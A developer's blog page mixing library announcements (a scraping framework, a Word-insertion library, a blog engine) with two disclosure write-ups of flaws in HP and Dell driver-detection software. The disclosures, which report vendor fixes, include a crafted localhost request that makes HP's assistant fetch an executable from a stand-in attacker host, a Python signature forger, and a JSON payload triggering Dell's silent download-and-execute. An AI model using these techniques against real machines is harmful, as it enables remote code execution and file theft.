Scraping websites with Cyborg

I often find myself creating one-off scripts to scrape data off websites for various reasons. My go-to approach for this is to hack something together with Requests and BeautifulSoup, but this was getting tiring. Enter Cyborg, my library that makes writing web scrapers quick and easy.

Cyborg is an asyncio-based pipeline orientated scraping framework - in English that means you create a couple of functions to scrape individual parts of a site and throw them together in a sequence, with each of those parts running asynchronously and in parallel. Imagine you had a site with a list of users and you wanted to get the age and profile picture of each of them. Here's how this is done in Cyborg, showing off some of the cool features:

from cyborg import Job, scraper
from aiopipes.filters import unique
import sys

@scraper("http://somesite.com/list_of_users")
def scrape_user_list(data, response, output):
   for user in response.find("#list_of_users > li"):
       yield from output({
           "username": user.get(".username").text
       })

@scraper("http://somesite.com/user/{username}")
def scrape_user(data, response):
   data['age'] = response.get(".age").text
   data['profile_pic'] = response.get(".pic").attr["href"]
   return data

if __name__ == "__main__":
   pipeline = Job("UserScraper") | scrape_user_list | unique('username') | scrape_user.parallel(5)
   pipeline > sys.stdout
   pipeline.monitor() > sys.stdout
   pipeline.run_until_complete()

That's it! The idea behind Cyborg is to keep the focus on the actual scraping, but getting benefits that are usually hard like parallel tasks, error handing and monitoring for free.

The library is very much in alpha, but you can find the project here on GitHub. Feedback welcome!

Our pipeline

Our pipeline is defined like so:

pipeline = Job("UserScraper") | scrape_user_list | unique('username') | scrape_user.parallel(5)
pipeline > sys.stdout

The Job() class is the start of our pipeline and it holds information like the name of the task ('UserScraper'). We use the | operator to add tasks to the pipeline, the first one being scrape_user_list. Any output from that task is passed to unique, which as you may have guessed filters out duplicate usernames that may be produced. This then passes output to the scrape_user function, and the .parallel(5) means start 5 parallel workers to process usernames.

The > operator is used to pipe the output of the pipeline to the standard output, but this could be any file-like object or function instead. This means you could write an import_into_database function that takes some scraped data and use SQL to add them to a database.

A key aim of Cyborg is to make monitoring the pipeline simple. The pipeline.monitor() > sys.stdout handles this for us by piping status information every second to the standard output. Below is some sample output from a real version of our pipeline (one that handles pagination and does a bit more work). You can see a progress bar for each task, including the 5 scrape_user workers. Error totals are also displayed here, if there are any.

UserScraper: 3 pipes
Runtime: 9 seconds
 |-------- scrape_user_list
           Input: 14/26 read.  53% done
           [=========*          ]  14/26
           Tasks:
 |-------- unique 
           Input: 825/825 read. 100% done
           [===================*] 825/825
 |-------- scrape_user
           Input: 8/825 read.   0% done
           [*                   ]   8/825
           Tasks:
  |------- [*                   ]   3/66
  |------- [*                   ]   3/92
  |------- [===*                ]   5/22
  |------- [===============*    ]   8/10

Scrapers

A scraper is a function decorated with @scraper, with the first argument being the page URL that is to be scraped. The response to that URL is passed as a parameter to the function, and the function should parse it to extract relevant information.

The scrape_user_list function is fairly simple, it takes a static URL (/list_of_users) and runs a simple CSS query on it to find HTML elements we are interested in using. It then uses yield from output to output a dictionary to the next phase of the pipeline. We need to use a yield from statement here as our scraper could produce an arbitrary number of outputs, so the yield from ensures that output is buffered until tasks further down the pipeline are ready to handle them.

The dictionary produced by scrape_user_list is used to format the scrape_user URL. So if scrape_user_list produces {'username': 'test'} then scrape_user's URL will be resolved to /user/test. This is then fetched and the age + profile picture is extracted from the response and the output passed on. As this is the last function in the pipeline then it gets output to stdout in JSON format.

The library itself

The library is pretty new, I wrote a 'draft' version that I wasn't very happy and this is a re-write much closer to what I had imagined originally. You can find the code on GitHub, or use pip install cyborg to get it installed locally.

HtmlToWord is now WordInserter

I've released a redesign of my HtmlToWord library, specifically it now supports Markdown and multiple different ways to interact with Word. It's now also been renamed to WordInserter to reflect this.

Originally HtmlToWord was designed to take HTML input, process it and then insert a representation of it into a Word document. I made this for a project at my work involving taking HTML input from a user (created using a WYSIWYG editor) and generating a Word document containing this. I was surprised to find no native way to do this in Word (other than emulating copy+paste, eww), so I made and released HtmlToWord. That library was tied directly to HTML, each supported tag was a individual class responsible for rendering itself.

This quickly got messy, and in a future version of the project for work Markdown was used instead, so I decided to re-write the library from scratch to handle this. HtmlToWord uses the HTML input to create a number of objects, one for each tag, and then calls a Render method on each of them. As WordInserter needs to process both HTML and Markdown I decided to better decouple the parsing from the rendering, otherwise the library would be full of duplicate code. It now takes some supported input and creates a tree of operations to perform which is then recursively fed to a specific renderer responsible for processing it.

The result of this is the code is a lot cleaner and more maintainable, and it supports different ways to take the input and insert it into Word. Currently only COM is supported, but in the future if other projects that directly manipulate .docx files mature a bit I can create a renderer that works on Linux.

Using the library is super simple:

from wordinserter import render, parse
from comtypes.client import CreateObject

# This opens Microsoft Word and creates a new document.
word = CreateObject("Word.Application")
word.Visible = True # Don't set this to True in production!
document = word.Documents.Add()
from comtypes.gen import Word as constants

markdown = """
### This is a title

![I go below the image as a caption](http://placehold.it/150x150)

*This is **some** text* in a [paragraph](http://google.com)

  * Boo! I'm a **list**
"""

operations = parse(markdown, parser="markdown")
render(operations, document=document, constants=constants)

I have also created an automated test script that renders a bunch of HTML and Markdown documents in both FireFox and Word. This is used to make a comparison document to quickly find any regressions or issues. Judging by the number of installs from PyPi and the number of other contributors to the Github project this library is useful to some people, I hope that they take a look at the redesign.

Here is a snapshot of the top of the comparison page:

HP Support Solutions Framework Security Issue

After discovering the flaw in Dell's System Detect software I looked into other similar software for issues. This post details two issues I found with the HP Product Detection software and explores the protections HP put in place. I'm also going to explain how they could be easily bypassed to allow an attacker to force files to be downloaded, read arbitrary data, registry keys and system information through the users browser with little or no interaction.

Timeline:

HP were incredibly prompt at fixing the issue and responding to communications. They have addressed these problems in a new version (11.51.0049) and have issued a security notification, available here. An updated version can (and should) be downloaded from their support page

  • 25/3/2015 - Contacted HP with a writeup and received an acknowledgement that it has been passed to the relevant software team
  • 10/4/2015 - Received notification that the vulnerability has been fixed

Summary

Many large hardware vendors offer tools to automatically detect the hardware configuration of users machines to take them to the exact drivers that they require. Just like Dell, HP feature this software prominently on their support landing page.

Unfortunately just like Dell the HP software contains a number of functions that you wouldn't expect. When you click "Find Now" you are actually downloading the complete HP Support Solutions Framework which includes functionality to:

  • Read arbitrary files and registry keys
  • Collect system information
  • Summarize installed drivers and devices
  • Initiate the HP Download Assistant to download arbitrary files

The program also attempts to send any collected data back to HP servers and also attempts to stop anyone but the HP support staff accessing it, but as I will demonstrate these checks are easily bypassed. Due to the nature of the software this means that any of these functions can be invoked by any web page you visit without any notification, and combined with the fact that the program shows no visible sign of running and it starts with the machine automatically means this is a very dangerous piece of software.

The juicy details

As previously stated the software installs a service on your computer and listens for HTTP requests on localhost:8092. The JavaScript in your browser then communicates with this service by making AJAX requests to that local port. Below shows the page fetching the version information of the installed software:

When a browser makes a HTTP request the browser adds some information to the headers about the page or context that initiated the request, in the Referer (yes, spelt like that) and Origin headers. Under usual circumstances these requests would be coming from the HP support site, so the Referer header might have a value of http://www8.hp.com/uk/en/drivers.html.

So let's get right into the code and see how these headers are used. After decompiling the software we find the following (abbreviated) function inside SolutionsFrameworkService.SsfWebserver:

private void GetContextCallback(IAsyncResult result)
{
   string uriString;
   if (request.QueryString.Get("callback") != null)
      uriString = request.Headers["Referer"] ?? "http://hp.com";
   else
     uriString = request.Headers["Origin"] ?? "http://hp.com";

   if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith("hp.com"))
   {
     ... error
   }
   else
   {
     ... process request
   }
}

The line we need to focus on is this:

if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith("hp.com"))

In English this translates to if the hostname ends with hp.com, which is the only way the program authenticates a valid request. On the face of it this might look like a perfectly valid way to ensure that a HTTP request came from a valid HP domain however it is critically flawed. The check only checks if the domain ends with hp.com, so if a hacker were to register the domain nothp.com and make a request from there then it would pass the check. Apart from giving me Déjà vu it also gives me a foot in the door - any command I issue will be processed by the software. So let's see what commands can be processed.

Triggering a download

When the program processes a request it inspects the first two components of the requested path. The first is used to look up a controller, and the second component (if present) specifies the method. In the Chrome screenshot above it is making a request to the version controller, which has one default action that returns the software version. Looking through the source there are several interesting controllers, but we shall start with the HPDIAcontroller which is used to drive the "HP Download and Install Assistant". The actual code is pretty convoluted and not particularly relevant, but what is interesting is that if we make a request to (some unimportant parameters omitted):

http://localhost:8092/hpdia/run?RemoteFile=https://hacker.com/messbox.exe&FileTitle=update.exe

Then this triggers the download assistant to start, which brings itself to the foreground downloads the file:

I looked long and hard but the software doesn't automatically install anything without user interaction. However this doesn't render the attack useless, far from it. The attacker is able to control the displayed file title ("update.exe" in the screenshot) and can completely hide the real executable name by calling it "_.exe", which causes the download assistant to display "(.exe)" after it. One redeeming feature of this software is that it only accepts download requests for files that are served over HTTPS.

If an inexperienced user were to visit an malicious page that looked like a real HP site telling them to update their software and the HP download manager pops up I think many might press install, which would execute the attacker's malware and compromise their machines. For some advanced malware merely being downloaded could be enough.

Edit: Funnily enough I told my housemate about this and he said he had the HP download assistant pop up once while browsing a "dodgy torrent site". Perhaps this was already known?

Harvesting users information

The software contains a large number of "harvesters" (named so in the code) which can be used to steal files from the users machines and read other system information like registry keys or driver details. This attack is bit more complex and targeted than the one above, but could be even more dangerous if executed correctly.

When an HP support technician attempts to diagnose problems with a customer's computer they may need to read specific files on the user's computer, or access other possibly sensitive information. The normal and legitimate steps taken by the software when a technician wishes to read information from the users machines are as follows (please excuse my terrible diagrams):

  1. The support technician issues a request to the program instructing it to run the "idfservice" controller
  2. This controller then makes an HTTP request to the host diagsgmdextpro.houston.hp.com, with the product line of the HP machine the user is using. This returns a list of files to harvest
  3. The program then reads the specified portions of the files and sends them back to diagsgmdextpro.houston.hp.com
  4. The support technician presumably accesses this information to diagnose any issues.

You can view an example of the servers response by visiting the following URL: http://diagsgmdextpro.houston.hp.com/ediags/solutions/harvestertemplate?productLine=KV, and below is a snippet of the result that instructs the software to read a registry key:

<TemplateFile>
   <FileName>Hewlett-Packard\\HPActiveSupport\\Version</FileName>
   <MatchType>regex</MatchType>
   <Matches>
      <MatchExpression i:nil="true"/>
      <Matches>
         <MatchData>
            <MatchExpression>
                ^HPSAVer: (\d{1,5}[.]\d{1,5}[.]\d{1,5}[.]\d{1,5}|[a-zA-z]+)$
            </MatchExpression>
            <Name>HPSAver</Name>
         </MatchData>
      </Matches>
      <Name i:nil="true"/>
   </Matches>
   <Source>registry</Source>
</TemplateFile>

This isn't actually a terrible system, because the system contacts an authoritative service to retrieve a list of files to download rather than accept this data from the client directly.

So how can an attacker exploit this? He or she need to trick the application into connecting to their server instead of one hosted by HP. One possible way to do this is to use a DNS spoofing attack (like DNS cache poisoning) so that the domain diagsgmdextpro.houston.hp.com resolves to an IP address they control. Another possible way is to man in the middle their connection, as they use a plaintext HTTP request to send and receive data. How to exactly do this is outside the scope of this post but it is possible.

Once done, the attacker can make the request to the users software and it will connect back to a machine that they control, which will instruct the software to read any file they choose. Thus the following happens:

  1. Attacker triggers the users browser into making a crafted request to the idfservice controller
  2. Program resolves the diagsgmdextpro.houston.hp.com to an attacker controlled IP and makes a request for files to read. The attacker returns a list of files he or she wants to read
  3. The program collects these files and sends them back to the diagsgmdextpro address, simply giving the data to the attacker.

As you can see from the sample XML above for each bit of data we read there has to be some form of filter in the form of a regular expression. We can simply use the expression .* to match the entire file. In the screenshot below I have made a simple web application that serves a malicious page that instructs the software to read C:\secret.txt and the user's system information. The console window to the left shows that the program has dutifully sent the data to the attacker controlled server.

Conclusion

I've described two flaws with the HP Solutions Framework that can be exploited to potentially compromise a users machine without much/any user interaction. While the first attack is not as bad as Dell's (which requires no user interaction at all) it could be just as dangerous to nontechnical users who might not consider a random HP download window popping up to be suspicious.

The second attack is more targeted than the first and requires more setup, but could be used to read sensitive user documents or information and pass it back to the attacker. This should be mitigated first by using HTTPS and second by explicitly verifying the servers SSL certificate to ensure it is connecting to a valid HP controlled server.

While I don't want to be too critical of HP because their response was prompt and speedy I do think that their security procedures are lacking if such software can be published by them. That being said they do make it clear to users that they are downloading the entire Support Solutions Framework and explain the functionality it includes.

Dell System Detect RCE vulnerability

I recently discovered a serious flaw with Dell System Detect that allowed an attacker to trigger the program to download and execute an arbitrary file without any user interaction. Below is a summary of the issue and the steps taken to bypass the protections Dell put in place.

Timeline:

The issue was fixed within two months and Dell were clear in their communications throughout.

  • 11/11/2014 - Contacted Dell about the issue and received an acknowledgement
  • 14/11/2014 - Received confirmation that Dells Internal Assessment team is investigating
  • 9/1/2015 - Dell state that they have fixed the issue by introducing additional validation and obfuscation
  • 10/1/2015 - Checked patched program and could not reproduce this exploit
  • 23/3/2015 - This post is published

Summary

Anyone who has owned a Dell will be familiar with the Dell Support page. You can get all the latest drivers for your exact machine configuration from this site by entering your Dell Service Tag, which can be found on a sticker somewhere on your machine or through clicking the shiny blue "Detect Product" button.

Clicking this button prompts you to download and install the "Dell System Detect" program, which is used to auto fill the service tag input and show you the relevant drivers for your machine.

While investigating this rather innocuous looking program I discovered that it accepts commands by listening for HTTP requests on localhost:8884 and that the security restrictions Dell put in place are easily bypassed, meaning an attacker could trigger the program to download and install any arbitrary executable from a remote location with no user interaction at all.

The interesting bit

If you click the button you are prompted to download and install the "Dell System Detect" program which conspicuously sits in your taskbar and starts itself with your machine. So this program is clearly part of the process of autodetecting the service tag, but how does the browser page communicate with it? You can use Chrome's excellent developer tools to view the network traffic of the page and see that it makes several requests to a service listening on localhost port 8884:

Ok, so it seems that the Dell System Detect runs a HTTP server that listens for requests, which are sent from the Dell Support page's JavaScript. So let's take a closer look at the program - it's a .NET 2.0 executable and can be completely decompiled with dotPeek into a set of Visual Studio solutions. A quick search through the code for "http" brings us to eSupport.Common.Client.Service.RequestHandlers.ProcessRequest which is responsible for processing a request through the processes HTTP port. Below is an abbreviated snippet showing how this function authenticates that requests come from a valid Dell domain:

public void ProcessRequest(HttpListenerContext context)
{
    String url = "";
    if (context.Request.UrlReferrer == null) url = context.Request.Headers["Origin"];
    else url = context.Request.UrlReferrer.AbsoluteUri;

    if (absoluteUri.Contains("dell"))
    {
        if (context.Request.HttpMethod == "GET")
          this.HandleGet(context);
        else if (context.Request.HttpMethod == "POST")
          this.HandlePost(context);
        ...
    }
}

So that's our first issue: the program attempts to verify that the request is sent from a Dell domain by only checking if "dell" is in either the HTTP Referrer or Origin headers. Why is this a problem? The HTTP Referrer can contain the full request URI including the host and path. This means an attacker could easily make a request with an origin of "http://hacker.com/dell" and this would pass the initial test as "dell" is in the string.

Armed with this information we can make requests to the program that are at least partially processed. Inside each of the method handlers (HandleGet, HandlePost) there is a fair bit of messy code, but below is a simplified version:

private void HandleGet(HttpListenerContext context)
{
  string[] urlParts = context.Request.Url.AbsolutePath.Split('/');
  MethodInfo method = FindService(urlParts[0]), urlParts[1]);

  string signature = context.Request.QueryString["signature"];
  string str3 = context.Request.QueryString["expires"];
  bool verified = new AuthenticationHandler().Authenticate(urlParts[0], urlParts[1], str3, signature);
  if (!verified) return Error()

  var result = method.Invoke(GetParameters(context.Request));
  return MakeResponse(result);
}

This function splits the request URL by the slash and uses the first two components to find the correct service to execute. In the Chrome screenshot above we see that the web page is making a request to clientservice/isalive, which means the program will execute the isalive method in the clientservice service.

After the service has been found it inspects two query string parameters, signature and expires, and passes them to the Authenticate method. If this passes then the service is invoked with other query string parameters as arguments.

It seems obvious by now that the program does a little bit more than simply retrieve your service tag, so before we look into the Authenticate method let's see what interesting things we can do.

Services

There are three services that can be used: diagnosticservice, downloadservice and clientservice. Within these are 25 methods, including getservicetag, getdevices, getsysteminfo, checkadminrights and downloadfiles. It seems that the entire Dell system support package is included with System Detect, meaning if we can bypass the authentication then we can trigger any of these methods.

The most interesting method is called downloadandautoinstall, which does exactly what it says on the tin.

[ServiceName("downloadservice")]
public class DownloadServiceLogic
{
    [RemoteMethodName("downloadandautoinstall")]
    public static ServiceResponse DownloadAndAutoInstall(string files)
    {
        // Download and execute URL's passed in the files parameter without prompting the user
    }
}

If we can bypass the Authenticate method then we can trigger this function which will download and execute whatever file we tell it to by making a request to http://localhost:8884/downloadservice/downloadandautoinstall. So lets take a look at the authenticate method which is the only thing stopping us:

public bool Authenticate(string service, string method, string expiration, string signature)
{
    var secret = string.Format("{0}_{1}_{2}_{3}", service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85");
    var hash = new SHA256Managed().ComputeHash(Encoding.UTF8.GetBytes(secret));

    string stringToEscape = Convert.ToBase64String(hash).TrimEnd('=');
    bool flag = stringToEscape.ToLower() == signature.ToLower() || Uri.EscapeDataString(stringToEscape).ToLower() == signature.ToLower();
    if (!flag)
        ErrorLog.WriteLog("Not authenticated");
    return flag;
}

Wow. Ok, so not exactly the hardest thing to break. The service, method, expiration and signature arguments are all attacker controlled and passed through GET arguments. The only thing not controlled by a remote attacker is the hard-coded GUID "2f68-48be-a09a-9f9b6424ad85".

Essentially all the function does is create a string with the arguments and the GUID then compare it with the one the user has given, and if it is a match the user is 'authenticated'. With this information in hand we can create a simple Python function to generate a valid signature:

def make_signature(service, method):
    expiration = int(time.time()) + 400000

    secret_string = "{}_{}_{}_{}".format(
        service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85"
    )

    hashed = hashlib.sha256(unicode(secret_string, "utf-8"))
    print("Secret: {}".format(secret_string))
    print("Hash: {}".format(hashed.hexdigest()))
    return expiration, base64.encodestring(hashed.digest()).rstrip(b"\n").rstrip(b"=")

If we can generate a valid token then we can trigger the "downloadandautoinstall" method with our arbitrary file by causing the user to make a GET request, which is very very easy to do. A simple way would be to embed an image in a web page with the source set to "http://localhost:8884/downloadservice/downloadandautoinstall" with the appropriate GET arguments. After some investigation it seems that the DownloadAutoInstall method needs a list of JSON strings containing information about files to download and install. Sending a JSON object like the following with a valid signature will trigger a download:

{
    "Name": "messbox.exe",
    "InstallOrder": 1,
    "IsDownload": True,
    "IsAutoInstall": True,
    "Location": r"http://www.greyhathacker.net/tools/messbox.exe"
 }

Conclusion

So in conclusion we can make anyone running this software download and install an arbitrary file by triggering their web browser to make a request to a crafted localhost URL. This can be achieved a number of ways, and the service will faithfully download and execute our payload without prompting the user.

I don't think Dell should be including all this functionality in such a simple tool and should have ensured adequate protection against malicious inputs. After contacting Dell and discussing the issue with their internal security team they pushed out a fix that included obfuscating the downloaded binary. While I cannot be sure I think they simply changed the conditional from "if dell in referrer" to "if dell in referrer domain name", which may be slightly harder to exploit but just as severe. There is now also a big agreement you have to accept before downloading that specifies what the software can do.

Simple 2

I've just about finished the next version of Simple, the markdown based blog that powers this site.

When I first made Simple it was because I disliked WordPress, which seemed a bit too bloated. Then I saw Svbtle and I really liked the minimalist design (mostly the posting interface) and decided to make a clone in Python.

This worked great and powered my blog for three years or so without any issues, but I became a bit tired of the minimal white design and wanted something with a bit more to look at. When I stumbled across the HPSTR Jekyll Theme I really liked the layout and design and decided to adapt that for the next version of Simple.

And so here it is. It tries to stay true to it's name by being simple to use and install whilst still having a decent feature set and a nice design. The editing interface is a styled textarea that grows as you type, and adding an image is a simple as dragging and dropping it onto the page. This will upload the image and insert the right markdown at your cursor position. You can also edit the title by just selecting it and typing.

One thing I really liked about the HPSTR theme is the large image header, and I decided to combine this with the Bing daily image. When writing a post you can view the last 25 daily images by clicking the picture icon in the top right and using the left and right arrows to navigate:

I've tried to make installing Simple a painless as possible. You create a virtual environment for Simple, install the package and then use the 'simple' command to create a blog. Creating and maintaining config files is a pain, so you can use the simple command to create nginx and supervisord config files with the right file paths included (You will likely need to run apt-get install nginx or yum install nginx, and install supervisor to use them).

>> mkdir blog && cd blog
>> python3.4 -m venv env
>> source env/bin/activate && pip install simpleblogging gunicorn
>> simple create
>> nano simple_settings.py
>> simple nginx_config yoursite.com --proxy_port=9009 > /etc/nginx/conf.d/simple.conf
>> simple supervisor_config env/ 9009 >> /etc/supervisord.conf
>> chown -R nobody:nobody ../blog
>> supervisorctl start simple && service nginx reload

And that's all you need.